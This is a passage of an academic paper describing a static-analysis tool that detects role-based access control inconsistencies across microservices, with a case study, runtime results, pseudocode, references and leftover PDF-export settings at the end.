the final url. parts of the url may also be constructed using values defined in the configuration files instead of hardcoded strings within the source code. our module also scans configuration files of the project to resolve those values. finally, the discovery module generates method-call graphs for individual microservices. it takes each controller method as the root node and populates child nodes by traversing subsequent method calls to the service layer and repository layer methods. for each microservice, the discovery module organizes all the scrapped information described above into a usable structure and passes them to the flow matcher module and analysis module. as discussed by walker et al. ( ), rbac security analysis for individual microservices is insufficient. it fails to acknowledge violations when an end-user gains access to a normally restricted resource by creating a proxy request through another microservice mediating the resource access through service layer rest calls. to detect such violations, we need to consider the whole msa mesh instead of a single msa, and we need to resolve rest communications between them to construct a complete centralized perspective. in our proposed model, the flow matcher module constructs the centralized communication graph for the whole msa mesh. it takes descriptions of rest-endpoints and rest-calls for each microservice prepared by the discovery module. it combines all the rest endpoints into a list and all the rest calls into another list. then it performs a brute force matching between those two lists to resolve all rest communications among the microservices. this involves matching the url (including port and path), http method, request type, and response type. however, it is common for modern microservices to use service discovery and service registry instead of a hardcoded ip address in the url (montesi & weber, ). to resolve this, our flow matcher module matches both the ip address and service name and checks if one of them matches. the service name is usually defined in each microservices’ configuration files and scrapped during the discovery phase. the flow matcher module also generates a diagram of rest communication for the whole microservice mesh for better visualization. the analysis module takes descriptions of method-call graphs and allowed roles from the discovery module and rest communication descriptions from the flow matcher module. additionally, it takes the role hierarchy tree from the user. figure shows a user-defined role tree passed to the analysis module as input. roles higher in the hierarchy tree are senior to the roles below in the tree; senior roles should have all the access rights junior roles have, plus additional rights the junior roles do not have. roles in separate paths of the hierarchy are not related to each other. the analysis module das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ combines method-call graphs of different microservices based on their rest communication. figure depicts a typical scenario of how combined method-call graphs are constructed. each node of the combined graphs can be a controller node, service node, or repository node. typically, only the controller nodes contain rbac information, that is, a list of allowed roles; however, the service layer and repository layer nodes can also have rbac information. to find potential rbac violations in those layers, the analysis module loops through all the nodes and analyzes the roles associated with them. the first three types of violations are only related to controller nodes. if any controller node does not have any roles associated with it, we detect it as a missing role violation. this is the most common type of violation that might occur since missing roles on controller methods do not cause any compilation errors. if a node contains a role that is not defined in the user-provided role hierarchy, we detect it as an unknown access violation. this type of violations typically results from typographical errors. if request types, response types, and http types of two controller methods are equal, but they have different rbac roles, we detect it as an entity access violation. this violation implies similar access to a particular entity with different roles. the unrelated access and conflicting hierarchy violations occur when a node contains multiple roles after performing the reduction and aggregation. in the reduction phase, the analysis module goes through each node and keeps the lowest role defined in the user-provided role hierarchy. the significance of this reduction is that it defines the minimum role required to access a specific part of the application. after reduction, in the aggregation phase, the analyzer traverses each graph and copies the allowed role from the parent node to the child node. if a child node contains an rbac role or a child node has multiple parents with different roles, then it aggregates the roles for that particular child node. figure shows how the analysis module labels each child node using the rbac roles of its parent nodes according to the role hierarchy shown in fig. . the conflicting hierarchy violation occurs when a node code contains two different roles where one role is an ancestor of another role in the user-defined role hierarchy. this violation indicates a place where a junior role potentially accesses an area reserved for a more senior role. it is only a potential violation because it is ambiguous whether a junior role is accessing an area reserved for a senior role or the senior role is accessing something allowed for the junior role (walker et al., ). the unrelated access violation is the opposite of the conflicting role violation. it happens when a node contains two roles role s role qrole p role crole brole a figure a sample user-defined role hierarchy tree. senior roles are higher in the tree; in this example, role s is the most senior role, role a is senior to b, which is senior to c. role p is senior to q. full-size doi: . /peerj-cs. /fig- das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ microservice a controllermethoda servicemethoda microservice b controllermethodb repositorymethodb get jar files application x application x controllermethoda servicemethoda controllermethodb servicemethodb repositorymethodb repositorymethoda servicemethoda controllermethoda microservice a controllermethoda servicemethoda repositorymethoda servicemethoda controllermethoda controllermethoda servicemethoda repositorymethoda analysis module flow matcher module discovery module servicemethodb microservice b controllermethodb repositorymethodb servicemethodb figure construction of combined method-call graphs. full-size doi: . /peerj-cs. /fig- das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ located in a different subtree of the user-defined role tree, that is, one role is not an ancestor of another role. this violation indicates areas where unrelated roles are accessing the same application area, which may indicate poorly separated concerns that could be refactored (walker et al., ). for example, considering the role hierarchy shown in fig. , if a node has roles {a, c} then it is detected as a conflicting hierarchy violation, and if a node has roles {a, p} then it is marked as an unrelated access violation. the categorization of violations defined in our proposed method is mostly similar to the ones discussed by walker et al. ( ). however, walker et al. ( ) only considered only a single microservice at a time, whereas we also analyze inconsistencies across microservices. our system finds potential rbac violations based on a user-defined role hierarchy for the whole microservice mesh (a set of microservices). it warns the developer about potential violations by providing a report of specific locations where the violations are detected and the categories, as discussed above. while some of the detected violations may be false-positive and intentional, our proposed method provides an overall idea of all possible rbac violations for a large and complex system. the categorization of the violations helps the developer understand each violation’s severity, while the specific locations of the violations help to find and fix them easily. case study the tms is an enterprise application developed at baylor university for central texas computational thinking, coding, and tinkering to facilitate the texas educator controllermethod roles: {a,b,c} controllermethod roles: {p,q} servicemethod servicemethod repositorymethod repositorymethod controllermethod roles: {c} controllermethod roles: {q} servicemethod servicemethod repositorymethod repositorymethod controllermethod roles: {c} controllermethod roles: {q} servicemethod roles: {c} servicemethod roles: {q} repositorymethod roles: {c,q} repositorymethod roles: {q} reduction aggregation figure reduction and aggregation of rbac roles. full-size doi: . /peerj-cs. /fig- https://github.com/cloudhubs/tms . das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://github.com/cloudhubs/tms http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ certification training program. the whole tms system consists of four individual microservices: user management system (ums), question management system (qms), exam management system (ems) and configuration management system (cms). all of the microservices are developed using the spring boot framework (walls, ) and structured into the controller, service, and repository layers. the rbac authorization is enforced using annotations on each controller method for the individual microservices, while the central authentication and authorization policies are defined using keycloak (red hat inc, a). figure shows the role hierarchy tree for the tms application. for our case study, we added mutants (jia & harman, ) for each type of violations that resulted in a total of seven rbac violations. our system successfully detected all those violations and provided a report with specific locations of the violations. in this section, we will discuss how our analysis process works in detail for the mutated application. the tms project utilizes an annotation-based configuration technique to define application layers. rest api configurations and rbac restrictions are also applied through annotations, which are common practice for enterprise applications. table lists frequently used annotations throughout the tms project. for our purpose, we only looked for the @restcontroller annotation in the discovery module. the http and paths type were extracted from the parameters of @requestmapping annotation or subtype annotations. paths can be defined at both class level or method level. we aggregated the class level paths with method-level paths to get the final path for each endpoint. the endpoints’ request and response types are superadmin reviewermoderator guestuseradmin figure role hierarchy tree of the tms application. full-size doi: . /peerj-cs. /fig- table annotations used in tms project. annotation target description @controller class indicates controller, service, and repository layers @service @repository @restcontroller class sub type of @controller to activate rest apis @requestmapping class and method defines http types and paths for rest endpoints @getmapping method sub types of @requestmapping for specific http types @postmapping @deletemapping @rolesallowed method lists a set of allowed roles das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ resolved by detecting parameters and return types of respective methods where the endpoints are defined. finally, the rbac roles are listed by detecting the parameters of the @rolesallowed annotation applied to each endpoint method. the resttemplate class is usually used for making rest calls in the spring boot applications where the methods getforobject, postforobject, deleteforobject, etc. are used for performing rest calls with specific http type. each of those methods takes a url parameter and a request object and returns a response object. we scan classes annotated with @service annotation and filter them if they contain resttemplate in their import statements to detect service layer rest calls. we then look for the methods described above and detect request and response types by checking the parameter type and return type. the urls are detected by performing a backward data flow analysis recursively, as described in the proposed method section. the method calls graph is constructed by traversing each endpoint method to the service layer and repository layer methods. after the discovery module completes gathering metadata for each msa, the flow matcher module combines them, and the analysis module performs the final analysis. the flow matcher module also generates a visual graph of the rest communications among the microservices using graphviz library (ellson et al., ). figure shows the generated graph for the tms application. figure inter microservice rest communications in tms. full-size doi: . /peerj-cs. /fig- das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while matching the request and response types, we only considered the supertype of the generic types. for example, list<aclass> and arraylist<aclass> are considered equal during matching. our analyzer reported two missing-role violations for the mutated applications by specifying the fully qualified name (msa name + package name + class name + method name) of the endpoint methods that are defined without specifying any rbac roles. it detected two unknown-role violations along with their locations. these two violations have resulted from data entry errors where “user” and “admin” roles are mistakenly typed as “usre” and “admin” respectively, which are not present in the role hierarchy shown in fig. . our analyzer flagged one entity access violation by pointing out a pair of fully qualified method names. methods getexams and getinitexams in cms have the same return type list<exam> and the same http type get but they have different rbac roles: “user” and “moderator” respectively. we found two conflicting hierarchy violations in the mutated tms application. one of them occurred in inter microservice communication, shown in fig. , where the cms module calls the ums module to retrieve examinee info. the getexaminee endpoint method in cms can be accessed with a “user” role which calls the getuserbyid endpoint method of ems via service layer rest call. however, the getuserbyid method in ems has annotated with the “admin” role, which is a direct ancestor of the “user” role. the second conflicting hierarchy violation, shown in fig. , occurred entirely within the qms module where both createcategory and deletecategory endpoint methods configurationcontroller::getexaminee() roles: {user, admin} reduction & aggregation: {user} userinfocontroller::getuserbyid() roles: {admin, superadmin} reduction & aggregation: {user, admin} umsservice::getexamineeinfo() roles: {} reduction & aggregation: {user} userrepository::getbyid() roles: {} reduction & aggregation: {user, admin} get cms ums figure conflicting hierarchy violation among cms and ums. full-size doi: . /peerj-cs. /fig- categorycontroller::createcategory() roles: {user, admin, superadmin} categorycontroller::deletecategory() roles: {admin, superadmin} categoryrepository::save() roles: {user, admin} categoryrepository::delete() roles: {admin} figure conflicting hierarchy violation within qms. full-size doi: . /peerj-cs. /fig- das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ call the save method of categoryrepository with conflicting roles. finally, we detected one unrelated access violation between cms and ems, where the method getquestions in cms has transitive access to the method listallquestionsforexam in ems via service layer rest call. they are annotated with “user” and “moderator” roles, respectively defined in separate subtrees of the role hierarchy. we tested both source code and bytecode version of our discovery module, which utilizes the javaparser library (bruggen, ) to parse the source code and javaassist library (jboss, ) to perform bytecode analysis to extract class definitions. we published our implementation as an open-source tool , , . we ran it against the tms project for benchmarking our analyzer and separately measured the runtime for each discovery, flow matcher, and analysis modules. for the discovery module, we break down our measurements for each microservice (cms, qms, ems and ums) and count the number of classes it scanned. note that the discovery module performs a deep scanning for the controller layer classes that are annotated with @restcontroller annotation and service layer classes that have resttemplate import to detect rest endpoints, security roles, and rest calls. for other classes, it performs just a shallow scan to construct the method call graphs. table shows the total runtime for each module and the breakdown for the discovery module for static bytecode analysis. we can immediately see that the discovery module takes the most significant time since it performs scanning of all class files to extract metadata. in contrast, the flow-matcher and the analysis module, operating on the extracted metadata, take comparatively less time. for the discovery module, runtime depends on the number of class files in each microservices. the runtime of the flow- matcher module depends on the number of rest endpoints and the number of rest calls, while the runtime of the analysis module depends on the number of inter- microservice rest connections and the depth of the function call graph. our experiment exhibits a reasonable runtime to perform the static code analysis for enterprise applications. in total, it took . seconds against the tms application, which consists of four microservices, a total of classes, and inter-microservice rest connections. for enterprise applications with many microservices, it is possible to run the discovery module in parallel for multiple microservices, which will significantly reduce the runtime. table runtime against tms testbed. module total time breakdown name runtime (s) msa time (s) discovery . cms . ems . qms . ums . flow matcher . – analysis . – sar from bytecode: https://github.com/ cloudhubs/rad. sar from source code: https://github. com/cloudhubs/rad-source. rbac analysis: https://github.com/ cloudhubs/rad-analysis. the benchmark is run on a mac os computer with a . ghz -core intel core i processor and gb ram. das et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-analysis https://github.com/cloudhubs/rad-analysis http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rbacassessment(pathtomicroservices, rolehierarchy) { // extract metadata for each path in pathtomicroservices { analyze project property files to get service-name, port, hard-coded string values, etc. extract class definition using static code analysis // populate serverlist and clientlist for each class { for each method { if the method annotated with rest annotations { extract api endpoint definition metadata add extracted metadata to serverlist follow each method call to create a method call graph extract rbac security roles associated with those methods add the graph to methodcallgraph as a subgraph } if the method contains rest api calls { extract api call descriptions e.g. http method, url, etc. add extracted metadata to clientlist } } } } // resolve inter-microservice rest connections for each server in serverlist { for each client in clientlist { if url, port, http method matches for server and client { add (server, client) pair to restconnections } } } // update method call graph for each connection in restconnections { add an edge from client to server in methodcallgraph } // reduction for each method in methodcallgraph { keep only the lowest role in rolehierarchy and discard others } // aggregation for each disjoint subgraph in methodcallgraph { traverse all paths and merge the roles from parent to child } // find inconsistencies for each method in methodcallgraph { if the method has conflicting roles according to rolehierarchy { report inconsistency } } } figure rbac assessment pseudocode. full-size doi: . /peerj-cs. /fig- das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to show the performance of our method on larger systems, the pseudocode for our algorithm is given in fig. . the amount of work necessary scales linearly with both the number of methods in the system and with the product of the rest calls and endpoints within the system, meaning our algorithm runs in o(m + e × c), where m is the number of methods, e is the number of rest endpoints, and c is the number of rest calls. since the number of methods in a system is usually much larger than the number of rest calls and endpoints, our algorithm will usually run in o(m). this is in line with the results of our experiment; the discovery module, which searches every method for the needed metadata, was responsible for the majority of the time taken. threats to validity there are several threats to the validity of our work to address. some of these arise from our experiment and some from how generalizable our approach is. internal threats to validity the primary threats to the validity of our experiment are the accuracy of the violations detected and the accuracy of the performance measures. since we introduced known mutants for the errors, we know our tool accurately detected all of the issues. performance- wise, we showed that our tool performed well on a small-sized application, and that the algorithm should scale up well with larger applications since the most expensive portion of the analysis scales only linearly with the number of methods in the project. external threats to validity there are three external threats to our work’s validity, which may affect how generalizable our results are. first, some of the detected inconsistencies might be false positives that is, those might be intentionally left behind by the developers. second, it depends on a user-defined role hierarchy that is assumed to contain roles universal to the application. this may not be true if users are defined in separate security realms; a role name in one realm may not be equivalent to the same role name in a different realm, either in its own access rights or in its relative position in the role hierarchy. in this case, a mapping would have to be supplied, showing which, if any, roles should be equivalent across the different realms. another limitation is the use of security annotations. if security policies are implemented differently than through annotations, are defined in a language or a framework that does not support annotations, the current approach would not detect the roles. however, if another method was used to extract allowed roles, they could be used in the rest of the analysis process. conclusion we introduced a novel solution to automatically detect authorization inconsistencies in the rbac implementation for enterprise applications using automated sar. our solution categorizes the violations into five types: missing-role violation, unknown access violation, entity access violation, unrelated access violation, and conflicting hierarchy violation. our analyzer scans a set of microservice artifacts and provides a report listing all the possible violations by pinpointing their locations and types. while some of das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the detected violations may be false-positive, the violation type, along with a specific location, helps the developer easily debug them, fix them, or discard them if they were intentional. although our analyzer was developed for a java enterprise application, our proposed approach is not restricted to any particular programming language or framework. it can easily be implemented for other languages and frameworks since all modern languages now have a well-structured abstraction for rest apis and rbac policies. one major shortcoming of our method is that it assumes the role hierarchy and association of users with roles are defined centrally. however, individual microservices can have separate role hierarchies or even different user-role associations. similarly, the trust management can be distributed across multiple domains like the drbac. in the future, we will extend our system to address these issues to allow multiple role hierarchies and multiple role mappings along with their decentralization. besides, we like to experiment on role assignment within a user session to identify possible inconsistencies while enforcing dsd. our long term goal is to perform such analysis within the cloud- native environment commonly used in production deployments, for example, analyzing dockerfiles and kubernetes artifacts. additional information and declarations funding this material is based upon work supported by the national science foundation under grant no. and a grant from red hat research. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation: . red hat research. competing interests the authors declare that they have no competing interests. author contributions � dipta das conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � andrew walker conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � vincent bushong conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � jan svacina conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � tomas cerny conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � vashek matyas conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and analysis are available at github, specifically: - bytecode analysis: https://github.com/cloudhubs/rad. - source code analysis: https://github.com/cloudhubs/rad-source. - rbac analysis: https://github.com/cloudhubs/rad-analysis. references ahn g-j, sandhu r. . role-based authorization constraints specification. acm transactions on information and system security ( ): – doi . / . . alshuqayran n, ali n, evans r. . towards micro service architecture recovery: an empirical study. in: ieee international conference on software architecture (icsa). piscataway: ieee, – . alur d, malks d, crupi j, booch g, fowler m. . core j ee patterns (core design series): best practices and design strategies. second edition. santa clara: sun microsystems, inc. basin d, burri sj, karjoth g. . dynamic enforcement of abstract separation of duty constraints. in: backes m, ning p, eds. computer security—esorics . berlin: springer, – . bass l, clements p, kazman r. . software architecture in practice. boston: addison-wesley professional. brachmann e, dittmann g, schubert k-d. . simplified authentication and authorization for restful services in trusted environments. in: de paoli f, pimentel e, zavattaro g, eds. service-oriented and cloud computing. berlin: springer, – . bruggen dv. . javaparser: analyse, transform and generate your java codebase. available at https://javaparser.org (accessed august ). castillo p, bernier j, arenas m, merelo guervÃs j, garcÃa-sánchez p. . soap vs rest: comparing a master-slave ga implementation. corr. arvix preprint arxiv: . v . cicchetti a, di ruscio d, iovino l, pierantonio a. . managing the evolution of data-intensive web applications by model-driven techniques. software & systems modeling ( ): – doi . /s - - - . ciuciu i, tang y, meersman r. . towards evaluating an ontology-based data matching strategy for retrieval and recommendation of security annotations for business process models. in: aberer k, damiani e, dillon t, eds. data-driven process discovery and analysis. berlin: springer, – . ellson j, gansner e, koutsofios l, north sc, woodhull g. . graphviz—open source graph drawing tools. in: mutzel p, jünger m, leipert s, eds. graph drawing. berlin: springer, – . ferraiolo df, cugini ja, kuhn dr. . role-based access control (rbac): features and motivations. in: proceedings of the th annual computer security applications conference. – . das et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cloudhubs/rad https://github.com/cloudhubs/rad-source https://github.com/cloudhubs/rad-analysis http://dx.doi.org/ . / . https://javaparser.org http://dx.doi.org/ . /s - - - https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. freudenthal e, pesin t, port l, keenan e, karamcheti v. . drbac: distributed role-based access control for dynamic coalition environments. in: proceedings nd international conference on distributed computing systems. – . granchelli g, cardarelli m, di francesco p, malavolta i, iovino l, di salle a. . towards recovering the software architecture of microservice-based systems. in: ieee international conference on software architecture workshops (icsaw). piscataway: ieee, – . habib ma, mahmood n, shahid m, aftab mu, ahmad u, nadeem faisal cm. . permission based implementation of dynamic separation of duty (dsd) in role based access control (rbac). in: th international conference on signal processing and communication systems (icspcs). – . hunsaker c. . rest vs soap: when is rest better for web service interfaces? available at https://stormpath.com/blog/rest-vs-soap (accessed august ). ibrahim a, bozhinoski s, pretschner a. . attack graph generation for microservice architecture. in: proceedings of the th acm/sigapp symposium on applied computing, sac ’ . new york: association for computing machinery, – . jboss. . javassist: java bytecode engineering toolkit. available at https://www.javassist.org (accessed august ). jendrock e, evans i, gollapudi d, haase k, srivathsa c, cervera-navarro r, markito w. . working with realms, users, groups, and roles. in: the java ee tutorial. vol. . boston: addison-wesley professional. jia y, harman m. . an analysis and survey of the development of mutation testing. ieee transactions on software engineering ( ): – doi . /tse. . . lee s, jo j, kim y. . method for secure restful web service. in: ieee/acis th international conference on computer and information science (icis). – . mcgraw g. . software security. ieee security & privacy magazine ( ): – doi . /msecp. . . mohanty h, mohanty j, balakrishnan a. . trends in software testing. singapore: springer. montesi f, weber j. . circuit breakers, discovery, and api gateways in microservices. arxiv preprint arxiv: . . mordani r. . jsr : common annotations for the javatm platform. available at https://jcp. org/en/jsr/detail?id= . oberle d, eberhart a, staab s, volz r. . developing and managing software components in an ontology-based application server. in: jacobsen h-a, ed. middleware . berlin: springer, – . omicini a, ricci a, viroli m. . rbac for organisation and security in an agent coordination infrastructure. electronic notes in theoretical computer science ( ): – . oracle. . securing restful web services using java security annotations. available at https://docs.oracle.com/middleware/ /wls/restf/secure-restful-service.htm#restf (accessed august ). pallets projects. . flask documentation quickstart ( . .x). available at https://flask. palletsprojects.com/en/ . .x/quickstart (accessed august ). quay. . clair: vulnerability static analysis for containers. github. available at https://github. com/quay/clair (accessed december ). rademacher f, sachweh s, zündorf a. . a modeling method for systematic architecture reconstruction of microservice-based software systems. in: nurcan s, reinhartz-berger i, das et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://stormpath.com/blog/rest-vs-soap https://www.javassist.org http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /msecp. . https://jcp.org/en/jsr/detail?id= https://jcp.org/en/jsr/detail?id= https://docs.oracle.com/middleware/ /wls/restf/secure-restful-service.htm#restf https://flask.palletsprojects.com/en/ . .x/quickstart https://flask.palletsprojects.com/en/ . .x/quickstart https://github.com/quay/clair https://github.com/quay/clair https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. soffer p, zdravkovic j , eds. enterprise, business-process and information systems modeling. cham: springer international publishing, – . rademacher f, sorgalla j, wizenty p, sachweh s, zündorf a. . graphical and textual model-driven microservice development. cham: springer international publishing, – . red hat inc. a. keycloak. available at https://www.keycloak.org (accessed august ). red hat inc. b. keycloak authorization services guide. available at https://www.keycloak.org/ docs/latest/authorization_services (accessed august ). richards m. . layered architecture. in: software architecture patterns. newton: o’reilly media, inc. salah t, jamal zemerly m, yeun cy, al-qutayri m, al-hammadi y. . the evolution of distributed systems towards microservices architecture. in: th international conference for internet technology and secured transactions (icitst). – . sandhu rs. . separation of duties in computerized information systems. in: dbsec. halifax: citeseer, – . sandhu rs, coyne ej, feinstein hl, youman ce. . role-based access control models. computer ( ): – doi . / . . sandhu rs, samarati p. . access control: principle and practice. ieee communications magazine ( ): – doi . / . . scarioni c, nardone m. . pro spring security: securing spring framework and boot -based java applications. berlin: springer. son s, mckinley ks, shmatikov v. . fix me up: repairing access-control bugs in web applications. in: network and distributed system security symposium. srivastava v, bond md, mckinley ks, shmatikov v. . a security policy oracle: detecting security holes using multiple api implementations. in: proceedings of the nd acm sigplan conference on programming language design and implementation, pldi. new york: association for computing machinery, – . steinegger r, giessler p, hippchen b, abeck s. . overview of a domain-driven design approach to build microservice-based applications. in: softeng: the third international conference on advances and trends in software engineering. sudhakar a. . techniques for securing rest. ca technology exchange ( ): – . swinhoe d. . the biggest data breaches of the st century. available at https://www. csoonline.com/article/ /the-biggest-data-breaches-of-the- st-century.html (accessed august ). thio l. . role-based authorization—flask-user v . documentation. available at https://flask- user.readthedocs.io/en/latest/authorization.html (accessed august ). tihomirovs j, grabis j. . comparison of soap and rest based web services using software evaluation metrics. information technology and management science ( ): – doi . /itms- - . vmware inc. . building a restful web service. available at https://spring.io/guides/gs/rest- service (accessed august ). vural h, koyuncu m, guney s. . a systematic literature review on microservices. in: gervasi o, murgante b, misra s, borruso g, torre cm, rocha ama, taniar d, apduhan bo, stankova e, cuzzocrea a, eds. computational science and its applications—iccsa . cham: springer international publishing, – . das et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.keycloak.org https://www.keycloak.org/docs/latest/authorization_services https://www.keycloak.org/docs/latest/authorization_services http://dx.doi.org/ . / . http://dx.doi.org/ . / . https://www.csoonline.com/article/ /the-biggest-data-breaches-of-the- st-century.html https://www.csoonline.com/article/ /the-biggest-data-breaches-of-the- st-century.html https://flask-user.readthedocs.io/en/latest/authorization.html https://flask-user.readthedocs.io/en/latest/authorization.html http://dx.doi.org/ . /itms- - https://spring.io/guides/gs/rest-service https://spring.io/guides/gs/rest-service https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. wagh dk, thool r. . a comparative study of soap vs rest web services provisioning techniques for mobile host. journal of information engineering and applications : – . walker a, svacina j, simmons j, cerny t. . on automated role-based access control assessment in enterprise systems. in: kim kj, kim h-y, eds. information science and applications. singapore: springer, – . walls c. . spring boot in action. first edition. shelter island: manning publications co. xu d, thomas l, kent m, mouelhi t, le traon y. . a model-based approach to automated testing of access control policies. in: proceedings of the th acm symposium on access control models and technologies, sacmattm . new york: association for computing machinery, – . das et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. on automated rbac assessment by constructing a centralized perspective for microservice mesh introduction related work proposed method case study threats to validity conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and 